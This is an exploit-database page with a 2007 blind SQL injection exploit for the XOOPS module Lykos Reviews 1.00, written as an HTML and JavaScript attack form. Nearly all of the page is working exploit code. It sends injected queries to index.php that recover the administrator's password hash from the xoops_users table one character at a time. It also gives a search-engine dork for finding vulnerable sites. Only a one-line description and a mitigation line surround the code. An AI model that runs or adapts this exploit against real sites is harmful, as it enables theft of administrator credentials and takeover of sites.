header-logo
Suggest Exploit
vendor:
Lykos Reviews
by:
ajann
9
CVSS
CRITICAL
BLIND SQL Injection
CWE
Product Name: Lykos Reviews
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the XOOPS Module Lykos Reviews 1.00 (index.php). The vulnerability allows the attacker to extract sensitive information from the database.

Mitigation:

Apply the latest patch or update the module to a secure version.
Source

Exploit-DB raw data:

<html>
<head>
<title>XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[Dork       : inurl:/modules/lykos_reviews/
//'[S.Page     : http://www.lykoszine.co.uk
//'[$$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================


   function nesneyarat() {

 var nesne;
 var tarayici = navigator.appName;

   
     if(tarayici == "Microsoft Internet Explorer"){
 nesne = new ActiveXObject("Microsoft.XMLHTTP");
    }
  else {
 nesne = new XMLHttpRequest();

  }
return nesne;
}

 var http = nesneyarat();



   function islemlink(adresyolla,charyolla) {

file="/modules/lykos_reviews/index.php?op=u&uid=1"
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim +  adresyolla + karakterim


 

 http.open('get', adres);
 http.onreadystatechange = cevapFonksiyonu;
 http.send(null);
   

}



   function cevapFonksiyonu() {
 if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

  if (document.getElementById('mesaj').value.indexOf('webmaster', 0) == -1) {
 alert('False');


  }

 if (document.getElementById('mesaj').value.indexOf('webmaster', 0) != -1)  {
   alert('TRUEEEEEEE');
   }
 


  }

function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
   document.getElementById('buton').value = "Test Character(1)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(1)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
   document.getElementById('buton').value = "Test Character(2)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(2)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
   document.getElementById('buton').value = "Test Character(3)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(3)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
   document.getElementById('buton').value = "Test Character(4)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(4)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
   document.getElementById('buton').value = "Test Character(5)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(5)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
   document.getElementById('buton').value = "Test Character(6)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(6)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
   document.getElementById('buton').value = "Test Character(7)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(7)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
   document.getElementById('buton').value = "Test Character(8)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(8)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
   document.getElementById('buton').value = "Test Character(9)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(9)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
   document.getElementById('buton').value = "Test Character(a)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(a)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
   document.getElementById('buton').value = "Test Character(b)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(b)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
   document.getElementById('buton').value = "Test Character(c)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(c)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
   document.getElementById('buton').value = "Test Character(d)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(d)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
   document.getElementById('buton').value = "Test Character(e)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(e)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
   document.getElementById('buton').value = "Test Character(f)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(f)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
   document.getElementById('buton').value = "Finished"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }



  }


</script>

   </head>

 <body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit</font></b></p>

<p></p>
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
  <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
  <p>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 
  Character 1-32]&nbsp;&nbsp; </font></b>
  <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden">&lt;/textarea&gt; <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


 </body>
 </html>

# milw0rm.com [2007-03-31]